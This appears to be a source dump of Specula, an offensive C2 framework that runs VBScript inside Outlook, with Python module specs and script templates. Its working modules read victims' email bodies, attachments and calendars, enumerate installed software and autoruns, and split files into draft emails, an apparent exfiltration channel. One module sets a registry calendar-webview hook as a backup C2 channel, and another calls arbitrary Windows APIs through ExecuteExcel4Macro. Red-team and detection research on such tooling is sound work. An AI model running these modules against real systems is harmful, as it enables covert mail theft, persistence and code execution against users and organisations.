| from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module will zip file or folder with contents specified. 10 | 11 | You specify the file/folder you want to zip using the path option - Full path. 12 | You specify the out zip file with the zipfile option - Full path 13 | 14 | It uses Scripting.FileSystemObject 15 | - FileExists 16 | - FolderExists 17 | - GetBaseName 18 | - GetFile 19 | - GetFolder 20 | - GetFileName 21 | - GetParentFolderName 22 | - BuildPath 23 | - OpenTextFile 24 | - GetAbsolutePathName 25 | 26 | It uses shell.application 27 | - Namespace 28 | - Namespace().CopyHere 29 | """ 30 | self.entry = 'zip_content' 31 | self.depends = [] 32 | self.options['path'] = { 33 | "value": None, 34 | "required": True, 35 | "description": "Target path of file/folder to zip - Ex: c:\\temp\\folderwithfiles or c:\\temp\\file.exe", 36 | "handler": quotedstring 37 | } 38 | self.options['zipfile'] = { 39 | "value": None, 40 | "required": True, 41 | "description": "Path to outputted zipped file - Ex: c:\\temp\\outfile.zip", 42 | "handler": quotedstring 43 | } 44 | super().__init__(templatepath) 45 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_installedapps.txt: -------------------------------------------------------------------------------- 1 | Function list_installedapps() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | objLocator.Add "__ProviderArchitecture", 64 5 | Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 6 | KeyPathApps = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\" 7 | objReg.EnumKey 2147483650, KeyPathApps, arrSubkeysapps 8 | apps = "Installed 64bits Applications:" & vbCrLf 9 | For Each strSubkeyapps In arrSubkeysapps 10 | objReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, "DisplayName", appName 11 | If appName <> "" Then 12 | objReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, "DisplayVersion", Version 13 | apps = apps & appName & " | " & Version & vbCrLf 14 | End If 15 | Next 16 | apps = apps & vbCrLf & vbCrLf 17 | 18 | objLocator.Add "__ProviderArchitecture", 32 19 | Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 20 | KeyPathApps = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\" 21 | objReg.EnumKey 2147483650, KeyPathApps, arrSubkeysapps 22 | apps = apps & "Installed 32bits Applications:" & vbCrLf 23 | For Each strSubkeyapps In arrSubkeysapps 24 | objReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, "DisplayName", appName 25 | If appName <> "" Then 26 | objReg.GetStringValue 2147483650, KeyPathApps & strSubkeyapps, "DisplayVersion", Version 27 | apps = apps & appName & " | " & Version & vbCrLf 28 | End If 29 | Next 30 | list_installedapps = apps & vbCrLf 31 | 32 | End Function -------------------------------------------------------------------------------- /functions/operation/file/check_filearch.txt: -------------------------------------------------------------------------------- 1 | Function check_filearch() 2 | On Error Resume Next 3 | Set BinaryStream = window.external.OutlookApplication.CreateObject("ADODB.Stream") 4 | 5 | BinaryStream.Type = 1 6 | BinaryStream.Open 7 | 8 | BinaryStream.LoadFromFile {{file}} 9 | 10 | If err.number <> 0 Then 11 | check_filearch = "An error happened - Did you point to a file that exists?" 12 | Exit Function 13 | End If 14 | On Error Goto 0 15 | 16 | skip = BinaryStream.Read(&H3C) 17 | positionSignature = BinaryStream.Read(4) 18 | 19 | strPosition="" 20 | For lngCounter = 0 to UBound(positionSignature) 21 | car= Ascb(Midb(positionSignature, lngCounter + 1, 1)) 22 | s = Hex(car) 23 | If Len(s) = 1 Then 24 | s = "0" & s 25 | End If 26 | strPosition = s & strPosition 27 | Next 28 | 29 | positionSignature = CInt("&H" & strPosition) 30 | 31 | BinaryStream.Position = positionSignature 32 | 33 | arr_signature = BinaryStream.Read(6) 34 | 35 | signature = "" 36 | For lngCounter = 0 to UBound(arr_signature) 37 | car= AscB(Midb(arr_signature, lngCounter + 1, 1)) 38 | s = Hex(car) 39 | If Len(s) = 1 Then 40 | s = "0" & s 41 | End If 42 | signature = signature & s 43 | Next 44 | 45 | BinaryStream.Close 46 | 47 | If signature = "504500004C01" Then 48 | check_filearch = {{file}} & " is x86" 49 | ElseIf signature = "504500006486" Then 50 | check_filearch = {{file}} & " is x64" 51 | End If 52 | End Function -------------------------------------------------------------------------------- /functions/operation/outlook/read_calendar.txt: -------------------------------------------------------------------------------- 1 | Function read_calendar() 2 | on error resume next 3 | Set folder = (window.external.OutlookApplication.GetNameSpace("MAPI")).GetDefaultFolder(9) 4 | 5 | myStart = Date & " 00:00 AM" 6 | myEnd = DateAdd("d", {{days_to_read}}, date) & " 23:59 PM" 7 | strRestriction = "[Start] > '" & myStart & "' AND [End] <= '" & myEnd & "'" 8 | Set oItems = folder.items 9 | oItems.IncludeRecurrences = True 10 | oItems.Sort "[Start]" 11 | 12 | Set oItemsInDateRange = oItems.Restrict(strRestriction) 13 | read_calendar = "Getting Calendar items from - " & folder.folderpath & vbCrLf & vbCrLf 14 | For Each currentItem In oItemsInDateRange 15 | if (currentItem.class = 26) then 16 | read_calendar = read_calendar & "-= Calendar object =-" & vbCrLf 17 | read_calendar = read_calendar & "Meeting Start and End: " & currentItem.start & " - " & currentItem.End & vbCrLf 18 | read_calendar = read_calendar & "Meeting Subject: " & currentItem.subject & vbCrLf 19 | read_calendar = read_calendar & "Meeting Recurring: " & currentItem.isRecurring & vbCrLf 20 | read_calendar = read_calendar & "Meeting Organizer: " & currentItem.Organizer & vbCrLf 21 | read_calendar = read_calendar & "Meeting Required Attendees: " & currentItem.RequiredAttendees & vbCrLf 22 | read_calendar = read_calendar & "Meeting Optional Attendees: " & currentItem.OptionalAttendees & vbCrLf 23 | if ({{include_body}}) then 24 | read_calendar = read_calendar & "Meeting Body: " & currentItem.body & vbCrLf & vbCrLf 25 | else 26 | read_calendar = read_calendar & vbCrLf 27 | end if 28 | end if 29 | next 30 | End Function -------------------------------------------------------------------------------- /functions/operation/outlook/read_email.txt: -------------------------------------------------------------------------------- 1 | Function read_email() 2 | on error resume next 3 | Set folder = (window.external.OutlookApplication.GetNameSpace("MAPI")).GetDefaultFolder({{folder_to_read_int}}) 4 | itemcount = {{items_to_read}} 5 | 6 | Set oItems = folder.items 7 | oItems.Sort "[CreationTime]", True 8 | 9 | if itemcount > folder.items.count then 10 | itemcount = folder.items.count 11 | end if 12 | 13 | read_email = "Getting Mail items from - " & folder.folderpath & vbCrLf & vbCrLf 14 | For i = 1 To itemcount 15 | if (oItems(i).class = 43) then 16 | read_email = read_email & "-= Mail object =-" & vbCrLf 17 | read_email = read_email & "Mail Subject: " & oItems(i).subject & vbCrLf 18 | read_email = read_email & "Mail To: " & oItems(i).To & vbCrLf 19 | read_email = read_email & "Mail Sender: " & oItems(i).sender & vbCrLf 20 | read_email = read_email & "Importance: " & oItems(i).importance & vbCrLf 21 | read_email = read_email & "Mail Attachments: " & oItems(i).attachments.count & vbCrLf 22 | if oItems(i).attachments.count <> "" then 23 | for ii = 1 To oItems(i).Attachments.count 24 | read_email = read_email & "Attachment name " & ii & ": " & oItems(i).Attachments(ii) & vbCrLf 25 | next 26 | end if 27 | 28 | read_email = read_email & "Mail Unread: " & oItems(i).UnRead & vbCrLf 29 | if ({{include_body}}) then 30 | read_email = read_email & "Mail Body format: " & oItems(i).bodyformat & vbCrLf 31 | read_email = read_email & "Mail Body: " & oItems(i).body & vbCrLf & vbCrLf 32 | else 33 | read_email = read_email & vbCrLf 34 | end if 35 | end if 36 | next 37 | End Function -------------------------------------------------------------------------------- /api/SpeculaApiPS/SpeculaApiPS.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {3be6a7fa-d612-40eb-b2df-d2d4ff8b27b2} 6 | False 7 | 8 | 9 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 10 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 11 | 12 | 13 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 14 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 15 | 16 | 17 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 18 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 19 | 20 | 21 | 22 | 23 | Source Files 24 | 25 | 26 | 27 | 28 | Generated Files 29 | 30 | 31 | Generated Files 32 | 33 | 34 | Generated Files 35 | 36 | 37 | -------------------------------------------------------------------------------- /hiddenFunctions/upload_file.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import makeint, quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.entry = 'upload_file' 9 | self.depends = [] 10 | self.options['file'] = { 11 | "value": None, 12 | "required": True, 13 | "description": "file we are uploading", 14 | "tab_complete": self.helpers.complete_path, 15 | "handler": None 16 | } 17 | self.options['chunksize'] = { 18 | "value": None, 19 | "required": True, 20 | "description": "size in bytes we are uploading per callback", 21 | "handler": makeint 22 | } 23 | self.options['destination'] = { 24 | "value": None, 25 | "required": True, 26 | "description": "where we are writing this out to", 27 | "handler": quotedstring 28 | } 29 | self.options['data'] = { 30 | "value": None, 31 | "required": False, 32 | "description": "where we are writing this out to", 33 | "handler": None, 34 | "handler": quotedstring, 35 | "hidden": True 36 | } 37 | super().__init__(templatepath) 38 | 39 | def rethandler(self, agent, options, data): 40 | if str(data).startswith("ERROR"): 41 | self.helpers.speclog("Upload failed - Clear task queue manually or it will loop forever",output=True) 42 | self.helpers.speclog(str(data),output=True) 43 | 44 | -------------------------------------------------------------------------------- /functions/execute/host/set_calendarhomepagehook.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | This module finds the current URL in use for C2 and sets it to the calendar webview. 11 | The purpose is that this can be used to configure a backup channel incase the inbox webview is deleted. 12 | 13 | It uses WbemScripting.SWbemLocator 14 | - ConnectServer(root\cimv2) 15 | - ConnectServer(root\cimv2).CreateKey 16 | - ConnectServer(root\cimv2).SetStringValue 17 | - ConnectServer(root\cimv2).SetDWORDValue 18 | 19 | """ 20 | self.entry = 'set_calendarhomepagehook' 21 | self.depends = ['./helperFunctions/Setregvalue_hkcu.txt'] 22 | self.options['homepageurl'] = { 23 | "value": "None", 24 | "required": True, 25 | "description": """" 26 | URL to Specula server. Will be set to HKCU\\software\\microsoft\\office\\version\\outlook\\webview\\calendar - URL reg_sz. 27 | If set to None it autoresolves to the current URL in use on this Specula server. 28 | If you want to use another Specula server as backup define the url to it here. 29 | """, 30 | "handler": quotedstring, 31 | "hidden": False 32 | } 33 | super().__init__(templatepath) 34 | 35 | def preprocess(self, agent): 36 | if self.options['homepageurl']['value'] == "None": 37 | self.options['homepageurl']['value'] = agent.url 38 | -------------------------------------------------------------------------------- /functions/operation/outlook/savedraft_filemail.txt: -------------------------------------------------------------------------------- 1 | Function savedraft_filemail() 2 | on error resume next 3 | Set sh = window.external.OutlookApplication.CreateObject("Wscript.Shell") 4 | 5 | LF = Chr(10) 6 | Set oFSO = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 7 | FullName = {{ sourcefile }} 8 | TargetDir = sh.ExpandEnvironmentStrings("%TEMP%") 9 | 10 | Name = oFSO.GetTempName 11 | SplitSize = {{ splitsize }} 12 | Size = 1024 * 1024 * SplitSize 13 | 14 | if oFSO.FileExists(FullName) then 15 | On Error Resume Next 16 | Set iFile = oFSO.GetFile(FullName) 17 | Set iStream = iFile.OpenAsTextStream(1) 18 | 19 | data = iStream.Read(iFile.Size) 20 | iStream.close 21 | 22 | Ext = 0 23 | offset = 1 24 | 25 | Do 26 | Ext = Right("00" & Ext + 1, 3) 27 | if ext > "999" then Error ("Too many files - maximum is 999!") 28 | 29 | NewName = TargetDir & Name & Ext 30 | Set oFile = oFSO.CreateTextFile(NewName, 2) 31 | 32 | If Size > Len(data)+1 - offset Then Size = Len(data) + 1 - offset 33 | 34 | oFile.Write Mid(Data, offset, Size) 35 | offset = offset + Size 36 | oFile.Close 37 | 38 | Set objMail = window.external.OutlookApplication.CreateItem(0) 39 | 40 | objMail.Subject = "" 41 | objMail.Body = Ext 42 | objMail.Attachments.Add(NewName) 43 | objMail.Save 44 | oFSO.DeleteFile(NewName) 45 | 46 | Loop Until offset >= Len(data) 47 | savedraft_filemail = "Draft emails with attachments saved with filebasename: " & Name 48 | else 49 | savedraft_filemail = "Error - SourceFile not found or some other strange error" 50 | end if 51 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_autoruns.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates autoruns defined on the agent 11 | 12 | It uses WbemScripting.SWbemNamedValueSet 13 | - Add 14 | - Add.__ProviderArchitecture 15 | 16 | It uses WbemScripting.SWbemLocator 17 | - ConnectServer(root\cimv2) 18 | - ConnectServer(root\cimv2).EnumValues 19 | - ConnectServer(root\cimv2).GetDwordValue 20 | - ConnectServer(root\cimv2).GetStringValue 21 | - ConnectServer(root\cimv2).GetExpandedStringValue 22 | - ConnectServer(root\cimv2).GetBinaryValue 23 | - ConnectServer(root\cimv2).GetMultiStringValue 24 | - ConnectServer(root\cimv2).GetQWORDValue 25 | 26 | It uses Scripting.FileSystemObject 27 | - GetFolder 28 | - GetFolder().Files 29 | - GetBaseName 30 | - GetExtensionName 31 | """ 32 | self.entry = 'list_autoruns' 33 | self.depends = ['./helperFunctions/Getallregvalues.txt', './helperFunctions/Getregvalue.txt', './helperFunctions/dir_lister.txt'] 34 | self.options['username'] = { 35 | "value": "Dummy", 36 | "required": True, 37 | "description": "Username, autoresolves to agents registered username", 38 | "handler": quotedstring, 39 | "hidden": False 40 | } 41 | super().__init__(templatepath) 42 | 43 | def preprocess(self, agent): 44 | self.options['username']['value'] = agent.username -------------------------------------------------------------------------------- /functions/execute/host/execute_excel4macro.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module spawns a new instance of excel and executes ExecuteExcel4Macro to execute provided call. 10 | ExecuteExcel4Macro("CALL(INPUT)") 11 | 12 | Example calling Windows API using INPUT: 13 | - set input ""Kernel32"",""GetTickCount"",""J"" 14 | - set input ""user32"",""SetCursorPos"",""JJJ"",1,2 15 | 16 | Info about the datatypes (J) 17 | B - 8-byte floating-point number (IEEE), Transferred by Value, C type double. 18 | C - Zero (null) terminated string (max. Length = 255 characters), Transferred by Reference, C type char * 19 | F - Zero (null) terminated string (max. Length = 255 characters), Transferred by Reference (modify in place), C type char * 20 | J - 4 bytes wide signed integer, Transferred by Value, C type long int 21 | P - Excel's OPER data structure, Transferred by Reference, C type OPER * 22 | R - Excel's XLOPER data structure, Transferred by Reference, C type XLOPER * 23 | 24 | It uses the excel application 25 | - ExecuteExcel4Macro 26 | """ 27 | self.entry = 'execute_excel4macro' 28 | self.depends = [] 29 | self.options['input'] = { 30 | "value": None, 31 | "required": True, 32 | "description": "What to execute, remember two double quotes around parameters, see help!", 33 | "handler": quotedstring 34 | } 35 | super().__init__(templatepath) 36 | -------------------------------------------------------------------------------- /functions/operation/outlook/read_emailnamedfolder.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring,makeint,makebool 3 | from lib.validators.generic import ischoice 4 | from lib.tab_completers.generic import tab_choice 5 | 6 | class Spec(SpecModule): 7 | def __init__(self, templatepath, helpers): 8 | self.options = {} 9 | self.helpers = helpers 10 | self.help = """ 11 | This module allows you to read mail items. 12 | Specify the folder with folder_to_read. 13 | Format should be: inbox\\sublevel1\\sublevel2 14 | 15 | It uses OutlookApplication 16 | - Session.Folders(1).folders.item(FoldersArray(0) 17 | """ 18 | self.entry = 'read_emailnamedfolder' 19 | self.depends = [] 20 | self.options['items_to_read'] = { 21 | "value": 10, 22 | "required": True, 23 | "description": "The number of items to read from the top (newest first)", 24 | "handler": makeint 25 | } 26 | self.options['include_body'] = { 27 | "value": "True", 28 | "required": True, 29 | "description": "List out the body of the email", 30 | "handler": makebool, 31 | "validator": ischoice, 32 | "validatorargs": {'choices': ["False", "True"]}, 33 | "tab_complete": tab_choice, 34 | "tab_args": {'choices': ["False", "True"]} 35 | } 36 | self.options['folder_to_read'] = { 37 | "value": "inbox", 38 | "required": True, 39 | "description": "What folder (freetext) to read emails from - ex: inbox\\subfolder", 40 | "handler": quotedstring, 41 | } 42 | super().__init__(templatepath) 43 | --------------------------------------------------------------------------------